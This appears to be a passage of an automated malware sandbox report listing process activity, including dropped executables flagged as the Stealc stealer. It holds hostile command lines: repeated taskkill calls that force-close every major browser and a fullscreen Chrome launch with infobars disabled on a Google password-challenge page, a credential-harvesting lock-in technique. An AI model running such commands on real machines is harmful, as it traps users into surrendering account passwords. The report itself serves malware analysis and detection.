                                                                                                                                      Target ID:35
                                                                                                                                      Start time:21:23:25
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM brave.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:36
                                                                                                                                      Start time:21:23:25
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:37
                                                                                                                                      Start time:21:23:27
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:38
                                                                                                                                      Start time:21:23:27
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1152 --field-trial-handle=2040,i,8769351574913738686,7511269282204500585,262144 /prefetch:8
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:39
                                                                                                                                      Start time:21:23:32
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM chrome.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:40
                                                                                                                                      Start time:21:23:32
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:41
                                                                                                                                      Start time:21:23:32
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4484 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:42
                                                                                                                                      Start time:21:23:32
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM msedge.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:43
                                                                                                                                      Start time:21:23:32
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:44
                                                                                                                                      Start time:21:23:32
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000336001\num.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000336001\num.exe"
                                                                                                                                      Imagebase:0xb80000
                                                                                                                                      File size:314'368 bytes
                                                                                                                                      MD5 hash:791FCEE57312D4A20CC86AE1CEA8DFC4
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002C.00000002.2630021156.0000000000587000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002C.00000002.2630993454.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002C.00000000.2616219253.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:45
                                                                                                                                      Start time:21:23:32
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:46
                                                                                                                                      Start time:21:23:32
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:47
                                                                                                                                      Start time:21:23:33
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM opera.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:48
                                                                                                                                      Start time:21:23:33
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:49
                                                                                                                                      Start time:21:23:33
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM brave.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:50
                                                                                                                                      Start time:21:23:33
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:51
                                                                                                                                      Start time:21:23:34
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:52
                                                                                                                                      Start time:21:23:35
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1992,i,7048868189645442855,15603037541109083957,262144 /prefetch:8
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:53
                                                                                                                                      Start time:21:23:40
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM chrome.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:54
                                                                                                                                      Start time:21:23:40
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:55
                                                                                                                                      Start time:21:23:40
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2904 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:56
                                                                                                                                      Start time:21:23:40
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM msedge.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:57
                                                                                                                                      Start time:21:23:40
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:58
                                                                                                                                      Start time:21:23:40
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:59
                                                                                                                                      Start time:21:23:40
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:60
                                                                                                                                      Start time:21:23:40
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe"
                                                                                                                                      Imagebase:0xf50000
                                                                                                                                      File size:1'829'376 bytes
                                                                                                                                      MD5 hash:86FEA273D36E3F9C8221E22B937B1929
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:61
                                                                                                                                      Start time:21:23:41
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM opera.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:62
                                                                                                                                      Start time:21:23:41
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:63
                                                                                                                                      Start time:21:23:41
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM brave.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:64
                                                                                                                                      Start time:21:23:41
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:65
                                                                                                                                      Start time:21:23:42
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:66
                                                                                                                                      Start time:21:23:43
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1152,i,15500864807837732652,8979653825790183584,262144 /prefetch:8
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:67
                                                                                                                                      Start time:21:23:47
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM chrome.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:68
                                                                                                                                      Start time:21:23:47
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:69
                                                                                                                                      Start time:21:23:48
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM msedge.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:70
                                                                                                                                      Start time:21:23:48
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:71
                                                                                                                                      Start time:21:23:48
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4516 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:72
                                                                                                                                      Start time:21:23:48
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:73
                                                                                                                                      Start time:21:23:48
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:74
                                                                                                                                      Start time:21:23:48
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM opera.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:75
                                                                                                                                      Start time:21:23:48
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:76
                                                                                                                                      Start time:21:23:48
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:taskkill /F /IM brave.exe /T
                                                                                                                                      Imagebase:0xb40000
                                                                                                                                      File size:74'240 bytes
                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:77
                                                                                                                                      Start time:21:23:48
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:78
                                                                                                                                      Start time:21:23:49
                                                                                                                                      Start date:06/10/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe"
                                                                                                                                      Imagebase:0xb20000
                                                                                                                                      File size:919'040 bytes
                                                                                                                                      MD5 hash:A914737C9AF5014B7CD65B6649094707
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
